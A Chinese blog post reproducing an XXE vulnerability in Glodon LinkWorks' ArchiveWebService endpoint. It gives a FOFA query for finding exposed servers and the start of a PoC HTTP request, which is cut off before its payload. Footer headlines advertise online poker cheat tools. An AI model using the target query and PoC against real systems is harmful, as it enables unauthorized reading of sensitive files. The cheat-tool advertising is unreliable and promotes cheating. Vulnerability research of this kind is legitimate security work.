广联达Linkworks ArchiveWebService XML实体注入漏洞复现
创始人
2025-01-07 20:36:42
0

0x01 产品简介

广联达 LinkWorks(也称为 GlinkLink 或 GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

广联达 LinkWorks /GB/LK/Document/ArchiveService/ArchiveWebService.asmx接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。

0x03 复现环境

FOFA:

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现

PoC

POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1 Host:  Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebServi

上一篇:中英双语介绍一级市场(Primary Market)和二级市场(Secondary Market)

下一篇:去中心化技术的变革力量:探索Web3的潜力

相关内容

热门资讯

透视讲解!hhpoker免费透... 透视讲解!hhpoker免费透视脚本,WePoKer辅助器(详细辅助wpk教程)准备好在hhpoke...
透视私人局!wepoker买脚... 透视私人局!wepoker买脚本靠谱吗,家乡大二有技巧没有(总是真的有挂)运家乡大二有技巧没有辅助工...
透视有挂“aapoker透视怎... 透视有挂“aapoker透视怎么用”一直是真的有挂(辅助挂)详细辅助2025新版教程;1、玩家可以在...
德普之星透视辅助软件!aapo... 德普之星透视辅助软件!aapoker怎么设置抽水,wepoker免费永久脚本(详细辅助可靠教程)是一...
透视挂!aapoker辅助挂,... 这是一款非常优秀的wpk私人局有透视吗 ia辅助检测软件,能够让你了解到wpk私人局有透视吗中牌率当...
透视透视!pokemomo辅助... 透视透视!pokemomo辅助工具,易趣麻将辅助脚本(真是真的是有挂)1、上手简单,内置详细流程视频...
透视真的“wpk透视辅助软件”... 透视真的“wpk透视辅助软件”真是真的是有挂(辅助挂)详细辅助玩家教你;运辅助工具,进入游戏界面。进...
wpk辅助器!wepoker线... wpk辅助器!wepoker线上大神,hhpoker开辅助软件(详细辅助wpk教程)1、不需要AI权...
透视系统!wepoker插件功... 透视系统!wepoker插件功能辅助器,新超圣伏虎(一直真的有挂)新超圣伏虎是一种具有地方特色的麻将...
透视透视!德普之星怎么作弊,w... 透视透视!德普之星怎么作弊,wepoker私人定制透视(详细辅助分享教程),支持语音通讯、好友开房及...